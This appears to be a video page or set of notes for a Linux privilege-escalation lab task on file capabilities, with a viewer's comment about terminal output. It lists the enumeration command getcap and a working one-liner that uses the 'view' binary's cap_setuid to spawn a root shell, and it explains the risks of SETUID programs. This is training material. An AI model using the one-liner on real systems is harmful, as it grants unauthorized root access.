Linux PrivEsc Task 8 Privilege Escalation: Capabilities

Hi Danny, thanks for the wonderful video.

It works.
One question thou, when i type 'cat view', why does it spew out binaries, and at the end, the terminal was blinking red and blue, the text in the terminal were struckthrough?
I remember another binary file that i opened, it just spew out binaries, without the red and blue flashing terminal.

clarkg

Linux PrivEsc Task 8 Privilege Escalation: Capabilities
pwd

whoami


getcap -r / 2>/dev/null

check gtfobins site

exploit view paste code below



/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'


When an executable file's setuid permission is set, users may execute that program with a level of access that matches the user who owns the file.


SETUID means that the executable can run under different permissions than the user who has executed it.

SETUID 0 or root means that when the program is run it is as if root ran it - which leaves you open to all the usual security risks of running something at high permission levels - it could potentially do anything to your system - so generally the number of applications that require SETUID should be minimised on a Unix box. Most security audits of Unix machines include looking for SETUID and SETGID files that are world writeable as they present a high risk.


see 6
= cap_net_bind_service, cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep /home/karen/vim = cap_setuid+ep /home/ubuntu/view = cap_setuid+ep

intothecodewithdanny